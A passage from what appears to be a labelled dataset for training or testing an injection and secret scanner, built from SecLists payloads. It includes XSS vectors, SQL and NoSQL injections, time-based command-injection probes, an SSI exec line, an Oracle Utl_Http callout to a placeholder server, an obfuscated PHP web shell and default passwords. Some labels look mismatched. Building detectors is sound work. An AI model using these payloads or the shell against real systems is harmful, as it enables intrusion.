{"payload": "<!--#exec cmd=\"/bin/ls /\" -->", "injection_type": "SSI"}}]} {"id": "seclists_00967", "source": "seclists", "source_license": "MIT", "text": "#!/bin/bash\n# Deploy script\ntar -xzf %3B%20str%3D%24%28echo%20TGJACN%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%205%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%22", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "%3B%20str%3D%24%28echo%20TGJACN%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%205%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%22", "injection_type": "cmd"}}]} {"id": "seclists_00968", "source": "seclists", "source_license": "MIT", "text": "<!-- User comment -->\n<p><input autofocus onblur=alert(1)></p>", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<input autofocus onblur=alert(1)>", "injection_type": "XSS"}}]} {"id": "seclists_00969", "source": "seclists", "source_license": "MIT", "text": "<html><body>\n<div class=\"user-content\">\"autofocus/onfocus=alert(1)//</div>\n</body></html>", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "\"autofocus/onfocus=alert(1)//", "injection_type": "XSS"}}]} {"id": "seclists_00970", "source": "seclists", "source_license": "MIT", "text": "GET /search?q=<summary id=x tabindex=1 onfocus=alert(1)></summary> HTTP/1.1\nHost: example.com", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<summary id=x tabindex=1 onfocus=alert(1)></summary>", "injection_type": "XSS"}}]} {"id": "seclists_00971", "source": "seclists", "source_license": "MIT", "text": "POST /api/login HTTP/1.1\nContent-Type: application/json\n\n' || 'a'=='a", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "' || 'a'=='a", "injection_type": "NoSQL"}}]} {"id": "seclists_00972", "source": "seclists", "source_license": "MIT", "text": "filename=\" or 0=0 #", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "\" or 0=0 #", "injection_type": "cmd"}}]} {"id": "seclists_00973", "source": "seclists", "source_license": "MIT", "text": "spring.datasource.password=pompey\nspring.datasource.url=jdbc:mysql://localhost:3306/app", "findings": [{"category": "credentials", "subcategory": "credentials.password", "severity": "critical", "compliance": ["NIST-800-53"], "fields": {"password": "pompey"}}]} {"id": "seclists_00974", "source": "seclists", "source_license": "MIT", "text": "GET /search?q=Exploit Name: Extraneous Open Brackets HTTP/1.1\nHost: example.com", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "Exploit Name: Extraneous Open Brackets", "injection_type": "XSS"}}]} {"id": "seclists_00975", "source": "seclists", "source_license": "MIT", "text": "# Server log\n[ERROR] Failed to process: |/usr/bin/id|", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "|/usr/bin/id|", "injection_type": "cmd"}}]} {"id": "seclists_00976", "source": "seclists", "source_license": "MIT", "text": "spring.datasource.password=E-Con,admin,epicrouter,\nspring.datasource.url=jdbc:mysql://localhost:3306/app", "findings": [{"category": "credentials", "subcategory": "credentials.password", "severity": "critical", "compliance": ["NIST-800-53"], "fields": {"password": "E-Con,admin,epicrouter,"}}]} {"id": "seclists_00977", "source": "seclists", "source_license": "MIT", "text": "username=' '&password=admin&submit=Login", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "' '", "injection_type": "SQL"}}]} {"id": "seclists_00978", "source": "seclists", "source_license": "MIT", "text": "<!-- User comment -->\n<p>Exploit Name: Basic double quoted attribute breaker</p>", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "Exploit Name: Basic double quoted attribute breaker", "injection_type": "XSS"}}]} {"id": "seclists_00979", "source": "seclists", "source_license": "MIT", "text": "#!/bin/bash\n# Deploy script\ntar -xzf 1.0", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "1.0", "injection_type": "cmd"}}]} {"id": "seclists_00980", "source": "seclists", "source_license": "MIT", "text": "# Server log\n[ERROR] Failed to process: ||echo$IFSJTVIEI$((59%2B6))$(echo$IFSJTVIEI)JTVIEI&", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "||echo$IFSJTVIEI$((59%2B6))$(echo$IFSJTVIEI)JTVIEI&", "injection_type": "cmd"}}]} {"id": "seclists_00981", "source": "seclists", "source_license": "MIT", "text": "# Application log\n[2024-01-15 14:22:33] Query executed: SELECT name FROM products WHERE id = ||6", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "||6", "injection_type": "SQL"}}]} {"id": "seclists_00982", "source": "seclists", "source_license": "MIT", "text": "GET /api/ping?host=\\x27 HTTP/1.1\nHost: internal.corp", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "\\x27", "injection_type": "cmd"}}]} {"id": "seclists_00983", "source": "seclists", "source_license": "MIT", "text": "<!-- User comment -->\n<p>JavaScript concatenation vector variant 1</p>", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "JavaScript concatenation vector variant 1", "injection_type": "XSS"}}]} {"id": "seclists_00984", "source": "seclists", "source_license": "MIT", "text": "# Application log\n[2024-01-15 14:22:33] Query executed: SELECT name FROM products WHERE id = '&'", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "'&'", "injection_type": "SQL"}}]} {"id": "seclists_00985", "source": "seclists", "source_license": "MIT", "text": "GET /api/ping?host=%2527%7C%20%5B%204%20-ne%20%24%28echo%20LVDDNF%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%2527 HTTP/1.1\nHost: internal.corp", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "%2527%7C%20%5B%204%20-ne%20%24%28echo%20LVDDNF%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%2527", "injection_type": "cmd"}}]} {"id": "seclists_00986", "source": "seclists", "source_license": "MIT", "text": "<?php\n\n$pass = \"9cdfb439c7876e703e307864c9167a15\"; //lol \n\n$A = chr(0x73);\n$B = chr(0x79);\n$X = chr(0x74);\n$D = chr(0x65);\n$E = chr(0x6d);\n\n$hook = $A.$B.$A.$X.$D.$E;\n\nif($pass == md5($_POST['password']))\n{\n $hook($_POST['cmd']);\n}\nelse\n{\n die();\n}\n\n?>\n", "findings": [{"category": "malicious", "subcategory": "malicious.shell", "severity": "critical", "compliance": [], "fields": {"shell_type": "php", "filename": "obfuscated-phpshell.php"}}]} {"id": "seclists_00987", "source": "seclists", "source_license": "MIT", "text": "GET /api/ping?host=&#x000003c HTTP/1.1\nHost: internal.corp", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "&#x000003c", "injection_type": "cmd"}}]} {"id": "seclists_00988", "source": "seclists", "source_license": "MIT", "text": "<html><body>\n<div class=\"user-content\"><dd onmousemove=\"alert(1)\">test</dd></div>\n</body></html>", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<dd onmousemove=\"alert(1)\">test</dd>", "injection_type": "XSS"}}]} {"id": "seclists_00989", "source": "seclists", "source_license": "MIT", "text": "DB_PASSWORD=RedHat,piranha,q,\nDB_HOST=localhost\nDB_PORT=5432", "findings": [{"category": "credentials", "subcategory": "credentials.password", "severity": "critical", "compliance": ["NIST-800-53"], "fields": {"password": "RedHat,piranha,q,"}}]} {"id": "seclists_00990", "source": "seclists", "source_license": "MIT", "text": "filename=&lt;&gt;&quot;'%;)(&amp;+", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "&lt;&gt;&quot;'%;)(&amp;+", "injection_type": "cmd"}}]} {"id": "seclists_00991", "source": "seclists", "source_license": "MIT", "text": "password: more\nusername: admin\nhost: db.internal.corp", "findings": [{"category": "credentials", "subcategory": "credentials.password", "severity": "critical", "compliance": ["NIST-800-53"], "fields": {"password": "more"}}]} {"id": "seclists_00992", "source": "seclists", "source_license": "MIT", "text": "#!/bin/bash\n# Deploy script\ntar -xzf %7C%20%5B%206%20-ne%20%24%28echo%20MCLZRV%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%257C", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "%7C%20%5B%206%20-ne%20%24%28echo%20MCLZRV%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%257C", "injection_type": "cmd"}}]} {"id": "seclists_00993", "source": "seclists", "source_license": "MIT", "text": "#!/bin/bash\n# Deploy script\ntar -xzf %27%7C%20%5B%206%20-ne%20%24%28echo%20RLZFDE%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%23", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "%27%7C%20%5B%206%20-ne%20%24%28echo%20RLZFDE%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%23", "injection_type": "cmd"}}]} {"id": "seclists_00994", "source": "seclists", "source_license": "MIT", "text": "<html><body>\n<div class=\"user-content\"><style>:target {color: red;}</style><fieldset id=x style=\"transition:color 10s\" ontransitioncancel=alert(1)></fieldset></div>\n</body></html>", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<style>:target {color: red;}</style><fieldset id=x style=\"transition:color 10s\" ontransitioncancel=alert(1)></fieldset>", "injection_type": "XSS"}}]} {"id": "seclists_00995", "source": "seclists", "source_license": "MIT", "text": "<html><body>\n<div class=\"user-content\">Exploit Name: XSS via VBScript MsgBox</div>\n</body></html>", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "Exploit Name: XSS via VBScript MsgBox", "injection_type": "XSS"}}]} {"id": "seclists_00996", "source": "seclists", "source_license": "MIT", "text": "# Server log\n[ERROR] Failed to process: '.print(`echo%20VXYNWW\\necho%20$((29%2B16))\\necho%20VXYNWW\\necho%20VXYNWW`)%3B%2525255C%2525255CVXYNWW", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "'.print(`echo%20VXYNWW\\necho%20$((29%2B16))\\necho%20VXYNWW\\necho%20VXYNWW`)%3B%2525255C%2525255CVXYNWW", "injection_type": "cmd"}}]} {"id": "seclists_00997", "source": "seclists", "source_license": "MIT", "text": "# Server log\n[ERROR] Failed to process: <IMG SRC=\"jav&#x09;ascript:alert('XSS');\">", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<IMG SRC=\"jav&#x09;ascript:alert('XSS');\">", "injection_type": "cmd"}}]} {"id": "seclists_00998", "source": "seclists", "source_license": "MIT", "text": "filename=XXXXX.%p", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "XXXXX.%p", "injection_type": "cmd"}}]} {"id": "seclists_00999", "source": "seclists", "source_license": "MIT", "text": "GET /api/users?id=or%201=1 HTTP/1.1\nHost: example.com", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "or%201=1", "injection_type": "SQL"}}]} {"id": "seclists_01000", "source": "seclists", "source_license": "MIT", "text": "GET /api/ping?host=%27%26%20sleep%200%20%26%26%20str%3D%24%28echo%20JICOQS%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%207%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20 HTTP/1.1\nHost: internal.corp", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "%27%26%20sleep%200%20%26%26%20str%3D%24%28echo%20JICOQS%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%207%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20", "injection_type": "cmd"}}]} {"id": "seclists_01001", "source": "seclists", "source_license": "MIT", "text": "username=or '7659'='7659&password=admin&submit=Login", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "or '7659'='7659", "injection_type": "SQL"}}]} {"id": "seclists_01002", "source": "seclists", "source_license": "MIT", "text": "# Application log\n[2024-01-15 14:22:33] Query executed: SELECT name FROM products WHERE id = char%4039%41%2b%40SELECT", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "char%4039%41%2b%40SELECT", "injection_type": "SQL"}}]} {"id": "seclists_01003", "source": "seclists", "source_license": "MIT", "text": "GET /profile?name=_context|length HTTP/1.1\nHost: example.com", "findings": [{"category": "malicious", "subcategory": "malicious.ssti", "severity": "critical", "compliance": [], "fields": {"payload": "_context|length", "injection_type": "SSTI"}}]} {"id": "seclists_01004", "source": "seclists", "source_license": "MIT", "text": "spring.datasource.password=Oracle,QS_WS,QS_WS,\nspring.datasource.url=jdbc:mysql://localhost:3306/app", "findings": [{"category": "credentials", "subcategory": "credentials.password", "severity": "critical", "compliance": ["NIST-800-53"], "fields": {"password": "Oracle,QS_WS,QS_WS,"}}]} {"id": "seclists_01005", "source": "seclists", "source_license": "MIT", "text": "filename=;echo%20KHMFRS$((69%2B67))$(echo%20KHMFRS)KHMFRS'", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": ";echo%20KHMFRS$((69%2B67))$(echo%20KHMFRS)KHMFRS'", "injection_type": "cmd"}}]} {"id": "seclists_01006", "source": "seclists", "source_license": "MIT", "text": "POST /api/login HTTP/1.1\nContent-Type: application/json\n\n';sleep(5000);", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "';sleep(5000);", "injection_type": "NoSQL"}}]} {"id": "seclists_01007", "source": "seclists", "source_license": "MIT", "text": "#!/bin/bash\n# Deploy script\ntar -xzf '||Utl_Http.request('http://<yourservername>') from dual--", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "'||Utl_Http.request('http://<yourservername>') from dual--", "injection_type": "cmd"}}]} {"id": "seclists_01008", "source": "seclists", "source_license": "MIT", "text": "#!/bin/bash\n# Deploy script\ntar -xzf %7C%20%5B%201%20-ne%20%24%28echo%20LQRKBX%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%255C%255C", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "%7C%20%5B%201%20-ne%20%24%28echo%20LQRKBX%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%255C%255C", "injection_type": "cmd"}}]} {"id": "seclists_01009", "source": "seclists", "source_license": "MIT", "text": "GET /api/ping?host=&#x0003C HTTP/1.1\nHost: internal.corp", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "&#x0003C", "injection_type": "cmd"}}]} {"id": "seclists_01010", "source": "seclists", "source_license": "MIT", "text": "filename=%7C%20%5B%209%20-ne%20%24%28echo%20RUNALC%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%5C%5C", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "%7C%20%5B%209%20-ne%20%24%28echo%20RUNALC%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%5C%5C", "injection_type": "cmd"}}]} {"id": "seclists_01011", "source": "seclists", "source_license": "MIT", "text": "<!-- User comment -->\n<p>Author Name: kishor</p>", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "Author Name: kishor", "injection_type": "XSS"}}]} {"id": "seclists_01012", "source": "seclists", "source_license": "MIT", "text": "spring.datasource.password=1919\nspring.datasource.url=jdbc:mysql://localhost:3306/app", "findings": [{"category": "credentials", "subcategory": "credentials.password", "severity": "critical", "compliance": ["NIST-800-53"], "fields": {"password": "1919"}}]} {"id": "seclists_01013", "source": "seclists", "source_license": "MIT", "text": "<input type=\"text\" value=\"<strong id=x tabindex=1 onbeforedeactivate=alert(1)></strong><input autofocus>\" name=\"search\">", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<strong id=x tabindex=1 onbeforedeactivate=alert(1)></strong><input autofocus>", "injection_type": "XSS"}}]} {"id": "seclists_01014", "source": "seclists", "source_license": "MIT", "text": "DB_PASSWORD=Oki,admin,OkiLAN,\nDB_HOST=localhost\nDB_PORT=5432", "findings": [{"category": "credentials", "subcategory": "credentials.password", "severity": "critical", "compliance": ["NIST-800-53"], "fields": {"password": "Oki,admin,OkiLAN,"}}]} {"id": "seclists_01015", "source": "seclists", "source_license": "MIT", "text": "<!-- User comment -->\n<p><template id=x tabindex=1 onfocus=alert(1)></template></p>", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<template id=x tabindex=1 onfocus=alert(1)></template>", "injection_type": "XSS"}}]} {"id": "seclists_01016", "source": "seclists", "source_license": "MIT", "text": "<input type=\"text\" value=\"<x%0Conxxx=1\" name=\"search\">", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<x%0Conxxx=1", "injection_type": "XSS"}}]} {"id": "seclists_01017", "source": "seclists", "source_license": "MIT", "text": "# Server log\n[ERROR] Failed to process: %2522%3B%20str%3D%24%28echo%20IOBNNP%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%207%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%27", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "%2522%3B%20str%3D%24%28echo%20IOBNNP%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%207%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%27", "injection_type": "cmd"}}]} {"id": "seclists_01018", "source": "seclists", "source_license": "MIT", "text": "# Application log\n[2024-01-15 14:22:33] Query executed: SELECT name FROM products WHERE id = or 1=1 or ''='", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "or 1=1 or ''='", "injection_type": "SQL"}}]} {"id": "seclists_01019", "source": "seclists", "source_license": "MIT", "text": "<input type=\"text\" value=\"<var onblur=alert(1) tabindex=1 id=x></var><input autofocus>\" name=\"search\">", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<var onblur=alert(1) tabindex=1 id=x></var><input autofocus>", "injection_type": "XSS"}}]} {"id": "seclists_01020", "source": "seclists", "source_license": "MIT", "text": "<input type=\"text\" value=\"IMG Dynsrc\" name=\"search\">", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "IMG Dynsrc", "injection_type": "XSS"}}]} {"id": "seclists_01021", "source": "seclists", "source_license": "MIT", "text": "# Server log\n[ERROR] Failed to process: &#X00003C;", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "&#X00003C;", "injection_type": "cmd"}}]} {"id": "seclists_01022", "source": "seclists", "source_license": "MIT", "text": "spring.datasource.password=IBM,CICSUSER,CISSUS,\nspring.datasource.url=jdbc:mysql://localhost:3306/app", "findings": [{"category": "credentials", "subcategory": "credentials.password", "severity": "critical", "compliance": ["NIST-800-53"], "fields": {"password": "IBM,CICSUSER,CISSUS,"}}]} {"id": "seclists_01023", "source": "seclists", "source_license": "MIT", "text": "GET /search?q=<iframe draggable=\"true\" ondragstart=\"alert(1)\">test</iframe> HTTP/1.1\nHost: example.com", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<iframe draggable=\"true\" ondragstart=\"alert(1)\">test</iframe>", "injection_type": "XSS"}}]} {"id": "seclists_01024", "source": "seclists", "source_license": "MIT", "text": "#!/bin/bash\n# Deploy script\ntar -xzf %2522%0A%20str%3D%24%28echo%20VOOIFO%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%209%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%252F%252F", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "%2522%0A%20str%3D%24%28echo%20VOOIFO%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%209%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%252F%252F", "injection_type": "cmd"}}]} {"id": "seclists_01025", "source": "seclists", "source_license": "MIT", "text": "username=\" or true--&password=admin&submit=Login", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "\" or true--", "injection_type": "SQL"}}]} {"id": "seclists_01026", "source": "seclists", "source_license": "MIT", "text": "GET /api/ping?host=%0A%20str%3D%24%28echo%20NNDFMH%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%207%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%27 HTTP/1.1\nHost: internal.corp", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "%0A%20str%3D%24%28echo%20NNDFMH%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%207%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%27", "injection_type": "cmd"}}]} {"id": "seclists_01027", "source": "seclists", "source_license": "MIT", "text": "filename=&#X000003c", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "&#X000003c", "injection_type": "cmd"}}]} {"id": "seclists_01028", "source": "seclists", "source_license": "MIT", "text": "GET /search?q=Author Name: ha.ckers.org HTTP/1.1\nHost: example.com", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "Author Name: ha.ckers.org", "injection_type": "XSS"}}]} {"id": "seclists_01029", "source": "seclists", "source_license": "MIT", "text": "filename=%7C%20%5B%203%20-ne%20%24%28echo%20WXFPFO%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%2527", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "%7C%20%5B%203%20-ne%20%24%28echo%20WXFPFO%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%2527", "injection_type": "cmd"}}]} {"id": "seclists_01030", "source": "seclists", "source_license": "MIT", "text": "spring.datasource.password=0007\nspring.datasource.url=jdbc:mysql://localhost:3306/app", "findings": [{"category": "credentials", "subcategory": "credentials.password", "severity": "critical", "compliance": ["NIST-800-53"], "fields": {"password": "0007"}}]} {"id": "seclists_01031", "source": "seclists", "source_license": "MIT", "text": "DB_PASSWORD=zhai\nDB_HOST=localhost\nDB_PORT=5432", "findings": [{"category": "credentials", "subcategory": "credentials.password", "severity": "critical", "compliance": ["NIST-800-53"], "fields": {"password": "zhai"}}]} {"id": "seclists_01032", "source": "seclists", "source_license": "MIT", "text": "GET /search?q=<article draggable=\"true\" ondragstart=\"alert(1)\">test</article> HTTP/1.1\nHost: example.com", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<article draggable=\"true\" ondragstart=\"alert(1)\">test</article>", "injection_type": "XSS"}}]} {"id": "seclists_01033", "source": "seclists", "source_license": "MIT", "text": "<!-- User comment -->\n<p>GIF89a/*<svg/onload=alert(1)>*/=alert(document.domain)//;</p>", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "GIF89a/*<svg/onload=alert(1)>*/=alert(document.domain)//;", "injection_type": "XSS"}}]} {"id": "seclists_01034", "source": "seclists", "source_license": "MIT", "text": "GET /search?q=<basefont onclick=\"alert(1)\">test</basefont> HTTP/1.1\nHost: example.com", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<basefont onclick=\"alert(1)\">test</basefont>", "injection_type": "XSS"}}]} {"id": "seclists_01035", "source": "seclists", "source_license": "MIT", "text": "# Server log\n[ERROR] Failed to process: <script>alert(\"XSS\")</script>", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<script>alert(\"XSS\")</script>", "injection_type": "cmd"}}]} {"id": "seclists_01036", "source": "seclists", "source_license": "MIT", "text": "<html><body>\n<div class=\"user-content\">Exploit String: <IMGSRC=\"javascript:alert('XSS')\"></div>\n</body></html>", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "Exploit String: <IMGSRC=\"javascript:alert('XSS')\">", "injection_type": "XSS"}}]} {"id": "seclists_01037", "source": "seclists", "source_license": "MIT", "text": "GET /api/ping?host=;echo$IFSGJTRRT$((27%2B79))$(echo$IFSGJTRRT)GJTRRT\\ HTTP/1.1\nHost: internal.corp", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": ";echo$IFSGJTRRT$((27%2B79))$(echo$IFSGJTRRT)GJTRRT\\", "injection_type": "cmd"}}]} {"id": "seclists_01038", "source": "seclists", "source_license": "MIT", "text": "GET /search?q=<fieldset onkeypress=\"alert(1)\" contenteditable>test</fieldset> HTTP/1.1\nHost: example.com", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<fieldset onkeypress=\"alert(1)\" contenteditable>test</fieldset>", "injection_type": "XSS"}}]} {"id": "seclists_01039", "source": "seclists", "source_license": "MIT", "text": "<!-- User comment -->\n<p>Author Name: ha.ckers.org</p>", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "Author Name: ha.ckers.org", "injection_type": "XSS"}}]} {"id": "seclists_01040", "source": "seclists", "source_license": "MIT", "text": "GET /profile?name=global HTTP/1.1\nHost: example.com", "findings": [{"category": "malicious", "subcategory": "malicious.ssti", "severity": "critical", "compliance": [], "fields": {"payload": "global", "injection_type": "SSTI"}}]} {"id": "seclists_01041", "source": "seclists", "source_license": "MIT", "text": "#!/bin/bash\n# Deploy script\ntar -xzf \"||echo%20GRZSSH$((83%2B88))$(echo%20GRZSSH)GRZSSH%26", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "\"||echo%20GRZSSH$((83%2B88))$(echo%20GRZSSH)GRZSSH%26", "injection_type": "cmd"}}]} {"id": "seclists_01042", "source": "seclists", "source_license": "MIT", "text": "#!/bin/bash\n# Deploy script\ntar -xzf 'echo%20VKYYJY$((60%2B15))$(echo%20VKYYJY)VKYYJY'", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "'echo%20VKYYJY$((60%2B15))$(echo%20VKYYJY)VKYYJY'", "injection_type": "cmd"}}]} {"id": "seclists_01043", "source": "seclists", "source_license": "MIT", "text": "<!-- User comment -->\n<p><strong onkeypress=\"alert(1)\" contenteditable>test</strong></p>", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<strong onkeypress=\"alert(1)\" contenteditable>test</strong>", "injection_type": "XSS"}}]} {"id": "seclists_01044", "source": "seclists", "source_license": "MIT", "text": "<!-- User comment -->\n<p><track onclick=\"alert(1)\">test</track></p>", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<track onclick=\"alert(1)\">test</track>", "injection_type": "XSS"}}]} {"id": "seclists_01045", "source": "seclists", "source_license": "MIT", "text": "<!-- User comment -->\n<p><param draggable=\"true\" ondragend=\"alert(1)\">test</param></p>", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<param draggable=\"true\" ondragend=\"alert(1)\">test</param>", "injection_type": "XSS"}}]} {"id": 